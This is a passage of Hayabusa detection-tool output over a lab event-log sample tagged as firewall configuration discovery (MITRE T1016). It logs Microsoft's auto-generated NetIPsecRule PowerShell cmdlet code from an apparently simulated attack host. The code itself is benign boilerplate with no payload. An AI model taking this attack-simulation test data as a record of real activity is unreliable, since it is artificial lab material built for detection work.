[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] 
${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) 
$__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', 
